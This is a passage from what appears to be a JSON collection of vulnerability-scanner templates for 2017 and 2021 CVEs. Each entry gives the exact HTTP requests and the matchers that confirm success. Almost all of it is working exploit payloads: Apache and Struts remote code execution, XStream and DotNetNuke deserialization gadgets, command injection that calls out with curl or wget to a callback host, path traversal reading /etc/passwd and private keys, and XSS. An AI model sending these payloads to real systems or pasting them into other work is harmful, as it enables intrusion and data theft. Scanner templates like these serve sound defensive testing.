Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 